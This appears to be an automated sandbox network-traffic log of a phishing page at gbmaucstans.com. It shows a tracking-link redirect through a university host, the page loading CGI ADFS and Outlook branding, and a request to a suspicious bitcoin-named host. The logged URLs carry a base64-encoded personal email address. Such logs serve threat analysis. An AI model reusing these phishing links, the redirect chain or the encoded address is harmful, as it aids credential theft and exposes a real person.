Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8oHTTP Parser: No <meta name="author".. found
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49742 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49742 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/bcc5fb0a8815/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8753fe19daf9b0e5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mail/favicon.ico HTTP/1.1Host: outlook.office.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mail/favicon.ico HTTP/1.1Host: outlook.office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qhefefhkqg4a9rhm372pr0wj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/css/style.css HTTP/1.1Host: federation.cgi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD HTTP/1.1Host: federation.cgi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3 HTTP/1.1Host: federation.cgi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://gbmaucstans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD HTTP/1.1Host: federation.cgi.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3 HTTP/1.1Host: federation.cgi.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20= HTTP/1.1Host: cubes.concordia.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20= HTTP/1.1Host: gbmaucstans.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://cubes.concordia.ca/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /main/ HTTP/1.1Host: gbmaucstans.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://cubes.concordia.ca/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
Source: global trafficHTTP traffic detected: GET /main/src.js HTTP/1.1Host: gbmaucstans.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://gbmaucstans.com/main/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gbmaucstans.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://gbmaucstans.com/main/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gbmaucstans.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
Source: unknownDNS traffic detected: queries for: cubes.concordia.ca
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2747sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 0ac2a8def4e2792sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
